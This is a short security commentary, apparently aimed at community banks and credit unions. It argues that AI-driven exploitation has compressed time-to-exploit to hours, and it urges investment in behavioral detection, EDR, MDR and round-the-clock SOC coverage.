Detection is the control that matters now

A multi-agent LLM framework called CVE-Genie reproduced 51% of CVEs published between June 2024 and May 2025 with verified, functional exploits, at a median of 18 minutes and an average cost of $2.77 per CVE. AI tools advertised on ransomware forums grew from 38 posts in December 2025 to 1,486 in February 2026. The attacker’s toolkit got dramatically cheaper, faster, and more automated in a very short period of time. AI is changing the economics of vulnerability exploitation. 

Most security programs were built on an assumption that is no longer holding: that there would be enough time between a vulnerability being disclosed and it being exploited to close the gap with a patch or a control. Time-to-exploit went from a median of 700 days in 2020 down to 44 days in 2025. Today, 28.3% of CVEs are exploited within 24 hours of public disclosure. A vulnerability management program running on weekly or monthly patch cycles is structurally mismatched to that reality. 

What this means for traditional controls 

Preventive controls still matter. Firewalls, network segmentation, patch management, and vulnerability scanning are not obsolete. But signature-based detection tools can only match patterns they already know, and a zero-day has no known signature yet. AI-assisted exploitation makes this limitation easy to exploit at scale and very low cost. 

IBM’s 2026 X-Force Threat Index found that 56% of the vulnerabilities tracked in 2025 required zero authentication to exploit. Attackers aren’t defeating the controls. They’re walking through a gap the controls don’t yet know is there. Vulnerability exploitation was the leading cause of attacks in 2025, accounting for 40% of incidents X-Force observed. 

Edge devices (firewalls, VPNs, routers) are increasingly targeted with zero-days because they carry privileged network access and have limited behavioral monitoring behind them. The Check Point VPN zero-day exploited this month, the sixth actively exploited Cisco vulnerability in 2026 alone, and multiple Palo Alto firewall vulnerabilities over the past year all follow this pattern. The tools designed to protect the perimeter are now preferred attack targets. 

Rick Howard makes this argument well in Cybersecurity First Principles: the industry has over-invested in controls that assume a stable perimeter and under-invested in the capability to detect and respond when that perimeter fails. AI-accelerated exploitation is making that imbalance visible in real time. 

What actually works 

If signature-based controls can’t stop what they haven’t seen, and if patching can’t keep pace with an exploitation timeline measured in hours, then detection is the control that actually matters. 

The security teams that will protect their institutions over the next few years are the ones that have invested in behavioral detection and 24/7 coverage. Endpoint detection and response (EDR) identifies suspicious activity based on behavior rather than signatures, which is what makes it effective against attacks with no known fingerprint yet. An MDR layer brings the around-the-clock coverage that most community banks and credit unions can’t reasonably staff internally. A 24/7 SOC with analysts who can act on what they’re seeing is the difference between detecting a compromise in progress and discovering it after the fact. 

Where to focus now 

Start with measurement. What is your mean time to detection across the kill chain? What percentage of monitoring runs around the clock versus business hours only? How much of the detection capability is behavioral versus signature-based? How strong is your detection coverage? The goal is heuristic detection at speed across your entire infrastructure. 

The gaps in those answers point directly to where the investment needs to go. The exploitation timeline has compressed to hours. The banks and credit unions without 24/7 detection coverage are carrying a risk that is growing by the day. 

Sources: 

CVE-Genie (arXiv), Halcyon ransomware AI tools (CSO Online), VulnCheck Q1 2025 (The Hacker News), Flashpoint n-day trends, IBM 2026 X-Force Index, Check Point CVE-2026-50751 (Rapid7), Cisco SD-WAN zero-days (SecurityWeek)